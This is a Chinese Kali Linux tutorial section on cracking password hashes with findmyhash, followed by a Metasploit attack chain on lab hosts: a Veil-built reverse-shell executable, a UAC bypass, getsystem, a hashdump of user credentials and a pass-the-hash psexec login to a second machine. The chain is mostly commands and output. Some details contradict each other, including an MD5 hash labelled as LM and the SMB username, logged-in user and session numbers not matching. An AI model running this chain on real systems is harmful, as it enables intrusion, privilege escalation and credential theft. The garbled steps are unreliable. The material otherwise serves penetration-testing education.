• 8.3 破解LM Hashes密码

    8.3 破解LM Hashes密码

    LM(LAN Manager)Hash是Windows操作系统最早使用的密码哈希算法之一。在Windows 2000、XP、Vista和Windows 7中使用了更先进的NTLMv2之前,这是唯一可用的版本。这些新的操作系统虽然可以支持使用LM哈希,但主要是为了提供向后兼容性。不过在Windows Vista和Windows 7中,该算法默认是被禁用的。本节将介绍如何破解LM Hashes密码。

    在Kali Linux中,可以使用findmyhash工具破解LM Hashes密码。其中,findmyhash命令的语法格式如下所示:

    1. findmyhash <Encryption> -h hash

    以上语法中,各个选项含义如下所示。

    • Encryption:指定使用的哈希加密类型。
    • -h:指定要破解的LM哈希值。
      【实例8-2】使用findmyhash命令攻击LM Hashes密码。执行命令如下所示:
    1. root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99
    2. Cracking hash: 5f4dcc3b5aa765d61d8327deb882cf99
    3. Analyzing with md5hood (http://md5hood.com)…
    4. hash not found in md5hood
    5. Analyzing with stringfunction (http://www.stringfunction.com)…
    6. hash not found in stringfunction
    7. Analyzing with 99k.org (http://xanadrel.99k.org)…
    8. hash not found in 99k.org
    9. Analyzing with sans (http://isc.sans.edu)…
    10. hash not found in sans
    11. Analyzing with bokehman (http://bokehman.com)…
    12. hash not found in bokehman
    13. Analyzing with goog.li (http://goog.li)…
    14. hash not found in goog.li
    15. Analyzing with schwett (http://schwett.com)…
    16. hash not found in schwett
    17. Analyzing with netmd5crack (http://www.netmd5crack.com)…
    18. hash not found in netmd5crack
    19. Analyzing with md5-cracker (http://www.md5-cracker.tk)…
    20. hash not found in md5-cracker
    21. Analyzing with benramsey (http://tools.benramsey.com)…
    22. hash not found in benramsey
    23. Analyzing with gromweb (http://md5.gromweb.com)…
    24. ***** HASH CRACKED!! *****
    25. The original string is: password
    26. The following hashes were cracked:
    27. ----------------------------------
    28. 5f4dcc3b5aa765d61d8327deb882cf99 -> password

    以上输出的信息是攻击LM Hashes密码的过程。经过一番的攻击,最后获取到哈希值5f4dcc3b5aa765d61d8327deb882cf99的原始密码是password。

    如果觉得破解LM Hashes太慢的话,可以使用Metasploit中的psexec模块绕过Hash值。下面将介绍使用psexec模块绕过Hash值的方法。

    (1)通过在目标主机(Windows 7)上运行Veil创建的可执行文件backup.exe,成功获取一个活跃的远程会话,如下所示:

    1. [*] Started reverse handler on 192.168.6.103:4444
    2. [*] Starting the payload handler
    3. [*] Sending stage (769536 bytes) to 192.168.6.106
    4. [*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:29:55 +0800

    从以上信息中,可以看到成功打开了会话1。

    (2)查看用户权限信息。执行命令如下所示:

    1. meterpreter > getuid
    2. Server username: WIN-RKPKQFBLG6C\lyw

    从输出的信息中,可以看到该用户的权限是一个普通权限。接下来,使用bypassuac模块绕过UAC。

    (3)设置lyw用户绕过UAC。执行命令如下所示:

    1. meterpreter > background
    2. [*] Backgrounding session 1
    3. msf exploit(handler) > use exploit/windows/local/bypassuac
    4. msf exploit(bypassuac) > set session 1
    5. session => 1
    6. msf exploit(bypassuac) > exploit
    7. [*] Started reverse handler on 192.168.6.103:4444
    8. [*] UAC is Enabled, checking level
    9. [+] UAC is set to Default
    10. [+] BypassUAC can bypass this setting, continuing
    11. [+] Part of Administrators group! Continuing
    12. [*] Uploaded the agent to the filesystem….
    13. [*] Uploading the bypass UAC executable to the filesystem
    14. [*] Meterpreter stager executable 73802 bytes long being uploaded..
    15. [*] Sending stage (769536 bytes) to 192.168.6.106
    16. [*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:34:38 +0800
    17. meterpreter > getsystem
    18. got system (via technique 1).
    19. meterpreter > getuid
    20. Server username: NT AUTHORITY\SYSTEM

    从输出的信息中,可以看到此时lyw用户权限已经为SYSTEM。

    (4)查看目标主机上所有用户的哈希密码值。执行命令如下所示:

    1. meterpreter > run post/windows/gather/hashdump
    2. [*] Obtaining the boot key
    3. [*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa174b19dae
    4. [*] Obtaining the user list and keys
    5. [*] Decrypting user keys
    6. [*] Dumping password hints
    7. Test:"123"
    8. [*] Dumping password hashes
    9. Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    10. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    11. Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
    12. HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
    13. lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
    14. alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::

    从输出的信息中,可以看到捕获到六个用户的哈希密码值。此时,可以使用SMB psexec模块绕过Hash值。

    (5)后台运行会话2。执行命令如下所示:

    1. meterpreter > background
    2. [*] Backgrounding session 2

    (6)使用SMB psexec模块,并设置需要的配置选项参数。执行命令如下所示:

    1. msf exploit(bypassuac) > use exploit/windows/smb/psexec
    2. msf exploit(psexec) > set RHOST 192.168.6.114 #设置远程主机地址
    3. RHOST => 192.168.6.114
    4. msf exploit(psexec) > set SMBUser Test #设置SMB用户
    5. SMBUser => alice
    6. msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:
    7. 22315d6ed1a7d5f8a7c98c40e9fa2dec #设置SMB密码
    8. SMBPass => aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec

    (7)启动攻击。执行命令如下所示:

    1. msf exploit(psexec) > exploit
    2. [*] Started reverse handler on 192.168.6.103:4444
    3. [*] Connecting to the server
    4. [*] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'
    5. [*] Uploading payload
    6. [*] Created \XBotpcOY.exe
    7. [*] Deleting \XBotpcOY.exe
    8. [*] Sending stage (769536 bytes) to 192.168.6.114
    9. [*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 17:32:13 +0800

    从输出的信息中,可以看到使用“Test”用户成功的打开了一个会话。

    原文: https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/43.html